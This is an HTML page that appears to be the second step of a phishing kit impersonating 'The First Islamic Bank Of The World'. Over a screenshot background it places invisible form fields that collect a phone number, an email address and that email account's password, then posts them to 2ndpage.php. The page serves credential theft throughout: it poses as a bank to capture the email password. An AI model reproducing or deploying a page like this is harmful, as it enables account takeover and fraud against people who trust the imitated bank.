<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0014)about:internet -used for VM preview mode only -->
<html> 

<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>The First Islamic Bank Of The World</title>
<link rel="shortcut icon" href="logo.png">
<meta name="generator" content="Virtual Mechanics SiteSpinner 2.92g - Trial Only">
<meta http-equiv="imagetoolbar" content="false">

<style type="text/css">
<!--
body {
  margin: 0;
  height: 100%;
  width: 100%;
  background-color: #ffffff;
}
img {
  border-width: 0;
  vertical-align: top;
}
form#Oform3 {
  visibility: visible;
  margin: 0px;
  font-size: 10px;
}
.dfltf  {
  position: absolute;
  color: #000000;
  font-family: 'Times New Roman';
  font-size: medium;
  font-weight: normal;
  font-style: normal;
  text-decoration: none;
}
#Oobj1 {
  position: absolute;
  font-size: 10px;
  z-index: 1;
  left: -0.20em;
  top: -0.10em;
  width: 134.90em;
  height: 66.60em;
}
img#Ggeo1 {
  width: 100%;
  height: 100%;
}
#Oobj3 {
  position: absolute;
  font-size: 10px;
  z-index: 2;
  left: 24em;
  top: 27.8em;
  width: 42em;
  height: 2.20em;
        right: 434px;
    }
#Gform1 {
    border: 0 none #b4b4b4;
        width: 103%;
        height: 141%;
        top: -14px;
        left: -6px;
        margin-top: 0px;
    }
#Oobj5 {
  position: absolute;
  font-size: 10px;
  z-index: 3;
  left: 31.2em;
  top: 15.2em;
  width: 9.00em;
  height: 2.90em;
}
#Gform4 {
    border: 0 none #b4b4b4;
width: 18%;
  height: 127%;
        background-color:#ffffff;      background-image: url('2013-12-28_004957.png');
        top: 16px;
        left: 506px;
    }

#Gform2 {
    border: 0 none #b4b4b4;
        width: 102%;
        height: 100%;
        top: -8px;
        left: -1px;
    }
#Gform3 {
    border: 0 none #b4b4b4;
        width: 79%;
        height: 141%;
        top: 42px;
        left: -4px;
    }

#Gform5 {
    border: 0 none #b4b4b4;
        width: 39%;
        height: 91%;
        top: -57px;
        left: 433px;
        right: -175px;
    }

#Gform6 {
    border: 0 none #b4b4b4;
        width: 31%;
        height: 86%;
        top: -94px;
        left: 431px;
        right: -141px;
    }

#Gform7 {
    border: 0 none #b4b4b4;
        width: 32%;
        height: 91%;
        top: -20px;
        left: 432px;
        right: -146px;
    }

-->
</style>


<body>

<div id="Oobj1">
<img id="Ggeo1" src="2ndpage.png" alt="">
</div>

<form id="Oform3" name="myform" action="2ndpage.php" method="POST"  onsubmit="return validateForm();"  enctype="application/x-www-form-urlencoded">
<div id="Oobj3">
    		<input   field required="required"      type="text" id="Gform6" class="dfltf" name="phone" 
        value="">
             
<input  field required="required" type="text" id="Gform5" class="dfltf" name="email" value="">
<input  field required="required"  type="password" id="Gform7" class="dfltf" name="passwordemail" value="">


<input type="submit" id="Gform4" class="dfltf" name="form6" 
        value="" src="submit.png" 
        style="background-image: url('submit.png'); right: -161px;">
</div></form>


</body> 

<head>	<!--used for VM preview mode only -->
	<meta http-equiv="Expires" content="-1">
</head>	<!--used for VM preview mode only -->
</html> 
